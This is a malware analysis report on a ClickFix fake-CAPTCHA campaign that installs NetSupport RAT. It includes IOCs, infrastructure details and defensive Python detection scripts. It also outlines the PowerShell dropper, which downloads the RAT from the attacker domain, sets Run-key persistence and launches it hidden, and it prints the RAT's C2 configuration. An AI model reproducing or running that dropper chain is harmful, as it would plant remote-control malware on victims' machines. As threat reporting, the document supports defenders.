NetSupport RAT v14.10: ClickFix Campaign Deploys Commodity RAT via Fake CAPTCHA Pages
Two Windows Server 2022 nodes named 'SMTP' on the same /24 subnet in Frankfurt, victim tracking IDs, and a domain registered just 48 hours before go-live
Overview
On March 12, 2026, Breakglass Intelligence analyzed a NetSupport RAT v14.10 deployment campaign using the ClickFix (also known as FakeCaptcha) delivery technique. A malicious MSI installer or PowerShell script delivered through a fake CAPTCHA page downloads a pre-packaged NetSupport RAT ZIP from applicationhost17.com, extracts it to %APPDATA%, and establishes persistence via a Run registry key. The RAT then beacons to a Windows Server 2022 C2 node at 172.94.9.4:443 using the standard NetSupport HTTP protocol.
The infrastructure tells a story of deliberate operational planning: two Windows servers sharing the hostname "SMTP" on the same /24 subnet (172.94.9.0/24) hosted at M247 Frankfurt, domain registration through Njalla (a privacy-first registrar), and per-victim tracking IDs to monitor install status. The download payload later migrated to Russian hosting (landvps.ru), pointing to an actor with established OPSEC practices and infrastructure-rotation awareness.
At time of analysis, the C2 was actively responding with HTTP 200 to beacon requests. The sample had 30/76 VirusTotal detections.
Sample Metadata
| Field | Value |
|---|---|
| Filename | UPD-48C5A1C5-DDD4-465E-9C66-27EFC1D5A846.zip |
| SHA256 | 36ad12ff7efbf323f58d7efd5977880419fc0452061f3ef2ca61cf73bb4bb5c1 |
| MD5 | 8a14ae0c80b64114ad63a146e1b0871c |
| SHA1 | 0654b2098e8dd2c868d10ac6248fdf4cacebddd2 |
| File Type | ZIP archive |
| File Size | 2,243,453 bytes |
| VT Detections | 30/76 |
| First Seen | 2026-03-12 17:13:41 UTC |
| Reporter | JAMESWT_WT |
| Bundle Contents | 15 files (8 PE, 2 INI, 2 DLL, 1 LIC, 1 INF, 1 TXT) |
The ClickFix Delivery Technique
ClickFix, active since mid-2024, is a social engineering technique that presents a fake browser or CAPTCHA error instructing users to manually paste a command into Win+R (Run dialog) or the browser address bar. This campaign's specific flow:
- Victim visits a page at `https://applicationhost17.com/captcha.php?vid=<CAMPAIGN_ID>`
- The fake CAPTCHA instructs the user to execute a command
- A PowerShell dropper runs with `-NoProfile -ExecutionPolicy bypass`
- The dropper downloads the NetSupport RAT ZIP, extracts it, sets persistence, and launches the RAT
- Tracking callbacks to `track.php` record when installation starts and completes
An MSI installer variant (5bfbe9.msi / bad.msi, SHA256: 78a511e1...) also exists, dropping PowerShell scripts to temp before fetching the main payload. The MSI publisher is left as "Your Company" -- a generic placeholder that reveals uncustomized tooling and a notable OPSEC failure.
The PowerShell Dropper Template
All observed PowerShell droppers follow an identical template with randomized variable names:
- Track start: `GET https://applicationhost17.com/track.php?vid=<VID>&action=started`
- Create install directory: `%APPDATA%\<GUID_DIR>\` (e.g., `TM-EA9F5A76-DE30-4BDF-9308-E1F4DF3B2569`)
- Download RAT ZIP: `IWR https://applicationhost17.com/downloads/<UUID>.zip`
- Extract and clean up: `Expand-Archive`, then delete the ZIP
- Set persistence: `HKCU\...\Run\SystemUpdate_<VID>` pointing to `client32.exe`
- Launch RAT: `Start-Process -WindowStyle Hidden`
- Track completion: `GET https://applicationhost17.com/track.php?vid=<VID>&action=completed`
Observed Campaign Variants
| VID | Installation Directory | Notes |
|---|---|---|
| jOTlMUPQ | TM-EA9F5A76-* / MW-3BE3C31C-* | Two directories, same VID |
| mMVTJvis | TM-07F72CBE-* | Separate tracking ID |
| 69b1c805806ef | SY-02B0EC74-* | Longer hex-like VID |
| 6566676869707172 | UPD-E9550778-* | Decodes to efghijpr -- sequential ASCII test values |
The last VID decoding to sequential ASCII characters strongly suggests the actor was testing the infrastructure with incremental values, and these test runs leaked into the wild.
NetSupport RAT: The Payload
client32.exe
| Field | Value |
|---|---|
| Version | V14.10 |
| Compiled | 2023-12-05 |
| Product | NetSupport Remote Control |
| Company | NetSupport Ltd |
| IMPHASH | a9d50692e95b79723f3e76fcf70d023e |
NetSupport Manager v14.10 is a legitimate remote administration tool being repurposed as an unauthorized RAT. The bundle includes:
- client32.exe: Main RAT client
- PCICL32.DLL: Primary networking DLL (3.7MB, 22/76 VT)
- remcmdstub.exe: Remote command execution / shell access
- nskbfltr.inf: Kernel keyboard filter for keylogging
- NSM.LIC: Forged license file (detected as `BackDoor.RMS.153` by DrWeb)
- HTCTL32.DLL: Audio/webcam capture capabilities
C2 Configuration (Client32.ini)
```ini
[CLIENT]
GatewayAddress=172.94.9.4
GSK=1 ; Gateway SecureKey enabled
PORT=443
[CONTROL]
SilentInstall=1
```
RAT Capabilities
Once installed, the operator has full control of the victim machine:
- Full desktop viewing and control
- Remote shell (cmd/PowerShell via `remcmdstub.exe`)
- File manager with upload/download
- Keyboard/mouse injection
- Keylogging (kernel filter driver)
- Screen capture and recording
- Audio and webcam capture
- Process management
C2 Infrastructure: The "SMTP" Twins
C2 Server: 172.94.9.4
| Field | Value |
|---|---|
| Hostname | SMTP (NetBIOS) |
| OS | Windows Server 2022 |
| ASN | AS9009 / AS213790 (M247 Europe SRL) |
| Location | Frankfurt am Main, Germany |
| Open Ports | 135 (MSRPC), 443 (C2), 445 (SMB v2), 5357 (HTTPAPI) |
| VT Malicious | 3/90 |
Port 443 carries plain HTTP, not TLS: the NetSupport protocol sends HTTP POST requests to /fakeurl.htm with the User-Agent NetSupport Manager/1.3. SMB and MSRPC being exposed indicates the attacker has not hardened the server.
Download/Tracking Server: 172.94.9.24
| Field | Value |
|---|---|
| Hostname | SMTP (same naming convention) |
| OS | Windows Server 2022 |
| ASN | AS9009 / AS213790 (same infrastructure) |
| Location | Frankfurt am Main, Germany |
| Open Ports | 3389 (RDP), 5357 (HTTPAPI) |
Port 3389 (RDP) with a valid TLS certificate CN=smtp is the attacker's management interface. Both servers share the same hostname "SMTP" and sit on the same /24 subnet -- a clear infrastructure reuse fingerprint.
Current Download Server: 77.105.133.95
| Field | Value |
|---|---|
| Hostnames | 163115.landvps.online, 152253.landvps.online |
| OS | Debian 11 |
| ASN | AS216334 (New Hosting Technologies LLC) |
| Location | Moscow, Russia |
| Server | Apache/2.4.66 |
The DNS for applicationhost17.com migrated from 172.94.9.24 to 77.105.133.95 between March 11 and March 12 -- the actor rotated the download server to Russian hosting while keeping the C2 node fixed in Frankfurt. The 600-second DNS TTL indicates active infrastructure management.
Download Domain: applicationhost17.com
| Field | Value |
|---|---|
| Registered | 2026-03-10T13:54:11Z (48 hours before campaign) |
| Registrar | Tucows (via Njalla privacy service) |
| Nameservers | 1-YOU.NJALLA.NO, 2-CAN.NJALLA.IN, 3-GET.NJALLA.FO |
| Registrant | Hashed/obfuscated (1f8f4166599d23ee) |
| Current A Record | 77.105.133.95 |
| Previous A Record | 172.94.9.24 (sandbox era) |
| VT Malicious | 11/94 |
| DNS TTL | 600 seconds |
The registrant fields contain truncated SHA256/HMAC hashes -- Njalla's standard obfuscation of real registrant data. No usable attribution from WHOIS.
C2 Communication Protocol
| URL | Method | User-Agent | Response |
|---|---|---|---|
| http://172.94.9.4/fakeurl.htm | POST | NetSupport Manager/1.3 | 200 OK |
| http://172.94.9.4:443/fakeurl.htm | POST | NetSupport Manager/1.3 | 200 OK |
| http://geo.netsupportsoftware.com/location/loca.asp | GET | NetSupport default | 404 |
| https://applicationhost17.com/track.php?vid=<VID>&action=started | GET | PowerShell UA | 500 |
| https://applicationhost17.com/track.php?vid=<VID>&action=completed | GET | PowerShell UA | 500 |
The geolocation beacon to geo.netsupportsoftware.com is a legitimate NetSupport feature -- its presence confirms the client is genuine NetSupport Manager software repurposed as a RAT.
Campaign Timeline
| Date | Event |
|---|---|
| 2023-12-05 | client32.exe compilation date |
| 2026-03-07 22:38:12 | ZIP bundle files timestamp |
| 2026-03-10 13:54:11 | applicationhost17.com registered via Njalla |
| 2026-03-11 | MSI and PS1 droppers first observed in sandboxes |
| 2026-03-12 17:13:41 | Primary ZIP submitted to VT by JAMESWT_WT |
| 2026-03-12 | DNS updated: 172.94.9.24 migrated to 77.105.133.95 |
The tight timeline -- domain registration to active campaign in 48 hours -- indicates a rapid-deployment operational tempo. The bundle files were timestamped March 7, suggesting the actor prepared the payload 3 days before registering the delivery domain.
Attribution Assessment
Confidence: MEDIUM
The actor uses ClickFix delivery (widely adopted since 2024), deploys commodity NetSupport RAT (low barrier, widely available), registers through Njalla (privacy-first registrar popular with Russian-nexus actors), and hosts infrastructure on M247 (low-KYC hoster) and Russian landvps.ru. The machine naming convention "SMTP" suggests deliberate misdirection -- making the servers appear as mail infrastructure in network logs.
The per-victim VID tracking system suggests a commercial/MaaS operation rather than a lone actor.
OPSEC Failures
- MSI publisher "Your Company": Generic placeholder reveals uncustomized tooling
- Shared hostname and subnet: Both C2 servers named "SMTP" on the same /24 -- infrastructure fingerprint
- 48-hour domain staging: Minimal time between registration and campaign activation
- Test VID in the wild: `6566676869707172` decoding to sequential ASCII suggests development/testing runs submitted to sandboxes
- RDP exposed: Port 3389 open on the download server -- actor management interface visible to internet scanners
MITRE ATT&CK TTPs
| ID | Technique | Detail |
|---|---|---|
| T1566 | Phishing | ClickFix fake CAPTCHA lure |
| T1204.002 | User Execution: Malicious File | User executes MSI or pastes PowerShell |
| T1059.001 | PowerShell | Dropper with -ExecutionPolicy bypass |
| T1105 | Ingress Tool Transfer | ZIP downloaded via Invoke-WebRequest |
| T1547.001 | Registry Run Keys | HKCU\...\Run\SystemUpdate_<VID> |
| T1036 | Masquerading | "software.zip", GUID directory names |
| T1219 | Remote Access Software | NetSupport Manager v14.10 as unauthorized RAT |
| T1071.001 | Application Layer Protocol: Web | HTTP POST /fakeurl.htm |
| T1095 | Non-Application Layer Protocol | NetSupport binary protocol over TCP 443 |
| T1112 | Modify Registry | Sets Run key for persistence |
| T1113 | Screen Capture | NetSupport screen view capability |
| T1056.001 | Input Capture: Keylogging | nskbfltr.inf kernel keyboard filter |
| T1021.001 | Remote Services: RDP | Actor RDPs to 172.94.9.24 for management |
IOC Tables
File Hashes
| SHA256 | Name | Type |
|---|---|---|
| 36ad12ff7efbf323f58d7efd5977880419fc0452061f3ef2ca61cf73bb4bb5c1 | UPD-48C5A1C5-*.zip | Primary ZIP bundle |
| 78a511e1da802149564639d4c3b66f67faee4bb6d762ffae4325075709217275 | 5bfbe9.msi / bad.msi | MSI dropper |
| 06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268 | client32.exe | NetSupport RAT v14.10 |
| 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 | PCICL32.DLL | NetSupport networking DLL |
| 6558b3307215c4b73fc96dc552213427fb9b28c0cb282fe6c38324f1e68e87d6 | remcmdstub.exe | Remote shell stub |
| ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54 | NSM.LIC | Forged license file |
| fcacfab09fe00dc26c86172fdc7482efb196e6cf725bef4d141d28dff4638619 | Client32.ini | C2 configuration |
| d96856cd944a9f1587907cacef974c0248b7f4210f1689c1e6bcac5fed289368 | nskbfltr.inf | Keyboard filter INF |
| 4343b537e338771434045022a4961a84ba42cdecd7e98f48087a4213d20b3f59 | dropper.ps1 (jOTlMUPQ) | PowerShell dropper |
| 876d5fdf5addc3f5e2987e841954248a4d15d9ecaca74ef317d76459f2cb3f13 | dropper.ps1 (jOTlMUPQ) | PowerShell dropper |
| 43ac17b48413c7c1545a8ce6f0b2219c3dd2a3289546c6886affbff9bfd15094 | dropper.ps1 (mMVTJvis) | PowerShell dropper |
| e2edb63c46dd8cf41c541ae45accfce66e41dc4ddcbef61ee3ea9dc9d8d7a588 | dropper.ps1 (test VID) | PowerShell dropper |
Network Indicators
| Indicator | Type | Role |
|---|---|---|
| 172.94.9.4 | IPv4 | NetSupport C2 |
| 172.94.9.24 | IPv4 | Download server / RDP management |
| 77.105.133.95 | IPv4 | Current download/tracking server |
| applicationhost17.com | Domain | Download + tracking panel |
| http://172.94.9.4/fakeurl.htm | URL | NetSupport C2 beacon |
| http://172.94.9.4:443/fakeurl.htm | URL | NetSupport C2 beacon (alt port) |
| https://applicationhost17.com/captcha.php | URL | ClickFix lure / PS1 delivery |
| https://applicationhost17.com/track.php | URL | Victim tracking |
| https://applicationhost17.com/downloads/ | URL | RAT payload staging |
| NetSupport Manager/1.3 | User-Agent | C2 traffic fingerprint |
Registry Indicators
| Key | Value | Purpose |
|---|---|---|
| HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdate_<VID> | "%APPDATA%\<GUID>\client32.exe" | Persistence |
File System Indicators
| Path | Description |
|---|---|
| %APPDATA%\TM-EA9F5A76-DE30-4BDF-9308-E1F4DF3B2569\ | RAT install dir |
| %APPDATA%\TM-07F72CBE-931E-4389-BEC0-21326A8A70C4\ | RAT install dir |
| %APPDATA%\MW-3BE3C31C-505C-43FD-9BBF-7E505ABA8D85\ | RAT install dir |
| %APPDATA%\SY-02B0EC74-4AE2-4686-96D2-CD15498FCFDF\ | RAT install dir |
| %APPDATA%\UPD-E9550778-2701-42F4-9FFD-36119FABE805\ | RAT install dir |
| %APPDATA%\<GUID>\client32.exe | NetSupport RAT binary |
Detection Guidance
Behavioral Indicators
- `powershell.exe` with `-ExecutionPolicy bypass` downloading from newly registered domains
- `client32.exe` running from `%APPDATA%\<UUID>\` (outside Program Files)
- DNS query to `geo.netsupportsoftware.com` from non-browser processes
- HTTP POST to `/fakeurl.htm` with User-Agent `NetSupport Manager/1.3`
- Run key name with `SystemUpdate_` prefix
- MSI Publisher = "Your Company"
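The PowerShell dropper template and the behavioral indicators above describe the same host artifacts from two sides: a Run value named `SystemUpdate_<VID>` and `client32.exe` launched from a `<PREFIX>-<GUID>` directory under `%APPDATA%`. The Python triage function below is an added example written for this write-up, not code from the campaign, from NetSupport, or from Breakglass Intelligence: it scores exported Run-key entries against that pattern and treats a `client32.exe` anywhere outside Program Files as a weaker match, so a licensed NetSupport install is not flagged. The sample entries, user names and the `Updater` path are constructed.

```python
"""Host-side triage of the Run-key persistence left by the dropper template.

Added example for this report; not code from the campaign or from NetSupport.
The Run entries below are constructed to show a hit, a miss and a weak match.
"""
import re
from typing import List, NamedTuple, Optional, Tuple

RUN_KEY = r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Install directory: <PREFIX>-<GUID>. Prefixes observed in the report: TM, MW, SY, UPD.
GUID_DIR = r"[A-Z]{2,3}-[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}"

# Run value data: client32.exe under %APPDATA%, written either as the literal
# variable or as the expanded Roaming path, with or without surrounding quotes.
RUN_VALUE_RE = re.compile(
    r'^"?(?:%APPDATA%|[A-Z]:\\Users\\[^\\]+\\AppData\\Roaming)\\'
    rf'(?P<dir>{GUID_DIR})\\client32\.exe"?$',
    re.IGNORECASE,
)
CLIENT32_RE = re.compile(r'\\client32\.exe"?$', re.IGNORECASE)
PROGRAM_FILES_RE = re.compile(r"\\Program Files( \(x86\))?\\", re.IGNORECASE)


class RunEntry(NamedTuple):
    key: str
    name: str
    value: str


class Finding(NamedTuple):
    entry: RunEntry
    reasons: Tuple[str, ...]
    severity: str  # "high" when name and path both match, otherwise "medium"


def assess_run_entry(entry: RunEntry) -> Optional[Finding]:
    """Score one Run value against the report's persistence pattern."""
    reasons = []
    if entry.name.startswith("SystemUpdate_"):
        reasons.append("value name uses the SystemUpdate_<VID> prefix")
    value = entry.value.strip()
    m = RUN_VALUE_RE.match(value)
    if m:
        reasons.append(f"client32.exe launched from %APPDATA%\\{m.group('dir')}")
    elif CLIENT32_RE.search(value) and not PROGRAM_FILES_RE.search(value):
        # A licensed NetSupport install lives under Program Files; anything
        # else running client32.exe deserves a look even without the GUID dir.
        reasons.append("client32.exe outside Program Files")
    if not reasons:
        return None
    return Finding(entry, tuple(reasons), "high" if len(reasons) >= 2 else "medium")


def triage(entries: List[RunEntry]) -> List[Finding]:
    """Return findings for every suspicious entry, in input order."""
    return [f for f in map(assess_run_entry, entries) if f is not None]


# Constructed sample: benign entry, campaign hit, licensed install, weak match.
SAMPLE_ENTRIES = [
    RunEntry(RUN_KEY, "OneDrive",
             r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    RunEntry(RUN_KEY, "SystemUpdate_jOTlMUPQ",
             r'"%APPDATA%\TM-EA9F5A76-DE30-4BDF-9308-E1F4DF3B2569\client32.exe"'),
    RunEntry(RUN_KEY, "NetSupport",
             r'"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe"'),
    RunEntry(RUN_KEY, "Updater",  # hypothetical weak match, constructed
             r"C:\Users\bob\AppData\Roaming\Updater\client32.exe"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_ENTRIES):
        print(f"[{f.severity}] {f.entry.key}\\{f.entry.name} -> {f.entry.value}")
        for r in f.reasons:
            print("   -", r)
```

On a live host the entries would come from an autoruns export or `reg query` output parsed into `RunEntry` tuples; the scoring logic does not change. Only the campaign entry reaches "high", because both the value name and the install path match; the licensed install under Program Files produces no finding at all.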
Network Signatures
- Block traffic to `172.94.9.4`, `172.94.9.24`, and `77.105.133.95`
- Block DNS resolution of `applicationhost17.com`
- Alert on HTTP POST requests to `/fakeurl.htm` from internal hosts
- Alert on User-Agent string `NetSupport Manager/1.3` from non-IT-approved systems
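The C2 Communication Protocol table, the VID observations under Observed Campaign Variants, and the network signatures above translate into a small proxy-log detector, added here as an example that is not part of the report and not NetSupport tooling. It tags the `/fakeurl.htm` POST and the `NetSupport Manager/1.3` User-Agent, the three known IPs, the lure domain's `track.php` and `/downloads/` paths, and the legitimate geolocation check, and it decodes hex-looking VIDs so that sequential-ASCII test values stand out. The log line format, timestamps, internal source IPs and the download UUID are constructed; the `WindowsPowerShell/` substring is assumed to be the default Invoke-WebRequest User-Agent.

```python
"""Proxy-log detection for the traffic described in this report.

Added example, not part of the original report and not NetSupport's own
tooling. The log format, sample lines and internal source IPs are constructed;
the URLs, IPs, domain and User-Agent string are the report's indicators.
"""
import re
from typing import Dict, List, Optional, Set
from urllib.parse import parse_qs, urlsplit

KNOWN_IPS = {"172.94.9.4", "172.94.9.24", "77.105.133.95"}
LURE_DOMAIN = "applicationhost17.com"
NETSUPPORT_UA = "NetSupport Manager/1.3"
GEO_HOST = "geo.netsupportsoftware.com"

# Constructed log format: <timestamp> <src_ip> <method> <url> <status> "<user-agent>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)


def decode_hex_vid(vid: str) -> Optional[str]:
    """Decode an even-length hex VID to printable ASCII; None if it is not one.

    jOTlMUPQ is not hex and 69b1c805806ef has odd length, so both give None.
    """
    if len(vid) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", vid):
        return None
    try:
        text = bytes.fromhex(vid).decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def classify(line: str) -> Optional[List[str]]:
    """Return detection tags for one log line, or None if nothing matched."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    url = urlsplit(m["url"])
    host = (url.hostname or "").lower()
    tags: List[str] = []
    if m["method"] == "POST" and url.path == "/fakeurl.htm":
        tags.append("netsupport-c2-beacon")  # HTTP POST /fakeurl.htm, any port
    if m["ua"] == NETSUPPORT_UA:
        tags.append("netsupport-ua")  # C2 traffic fingerprint
    if host in KNOWN_IPS:
        tags.append(f"known-infrastructure:{host}")
    if host == GEO_HOST:
        tags.append("netsupport-geo-check")  # legitimate feature, confirms genuine client
    if host == LURE_DOMAIN or host.endswith("." + LURE_DOMAIN):
        tags.append("lure-domain")
        if url.path == "/track.php":
            q = parse_qs(url.query)
            vid = q.get("vid", [""])[0]
            action = q.get("action", [""])[0]
            tag = f"victim-tracking:{action}:{vid}"
            decoded = decode_hex_vid(vid)
            if decoded:
                tag += f" (hex->{decoded!r}, possible test VID)"
            tags.append(tag)
        elif url.path.startswith("/downloads/") and url.path.endswith(".zip"):
            tags.append("payload-staging")
        if "WindowsPowerShell/" in m["ua"]:
            tags.append("powershell-client")  # assumed IWR default User-Agent
    return tags or None


def scan(log_text: str) -> List[Dict[str, object]]:
    """Run classify() over every line; keep only the lines that matched."""
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        tags = classify(line)
        if tags:
            m = LOG_RE.match(line.strip())
            hits.append({"ts": m["ts"], "src": m["src"], "tags": tags})
    return hits


def beaconing_hosts(log_text: str) -> Set[str]:
    """Internal hosts that issued the /fakeurl.htm POST, i.e. confirmed C2 check-ins."""
    return {str(h["src"]) for h in scan(log_text) if "netsupport-c2-beacon" in h["tags"]}


# Constructed sample log; the PowerShell User-Agent and download UUID are placeholders.
PS_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"
SAMPLE_LOG = f"""\
2026-03-12T17:20:01Z 10.0.0.15 GET https://applicationhost17.com/captcha.php?vid=jOTlMUPQ 200 "Mozilla/5.0"
2026-03-12T17:20:09Z 10.0.0.15 GET https://applicationhost17.com/track.php?vid=jOTlMUPQ&action=started 500 "{PS_UA}"
2026-03-12T17:20:12Z 10.0.0.15 GET https://applicationhost17.com/downloads/00000000-0000-4000-8000-000000000000.zip 200 "{PS_UA}"
2026-03-12T17:20:30Z 10.0.0.15 POST http://172.94.9.4:443/fakeurl.htm 200 "NetSupport Manager/1.3"
2026-03-12T17:20:31Z 10.0.0.15 GET http://geo.netsupportsoftware.com/location/loca.asp 404 "NetSupport Manager/1.3"
2026-03-12T17:21:00Z 10.0.0.22 GET https://applicationhost17.com/track.php?vid=6566676869707172&action=completed 500 "{PS_UA}"
2026-03-12T17:21:05Z 10.0.0.31 GET https://www.example.com/ 200 "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["src"], ", ".join(hit["tags"]))
    print("beaconing hosts:", sorted(beaconing_hosts(SAMPLE_LOG)))
```

Matching the POST path rather than the port is deliberate: the report shows the same beacon on both `http://172.94.9.4/fakeurl.htm` and `:443`, so a port-bound rule would miss one of them. The tracking callbacks are tagged even though the server answered 500, since the request itself is the evidence that the dropper ran on that host.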
Analysis by GHOST -- Breakglass Intelligence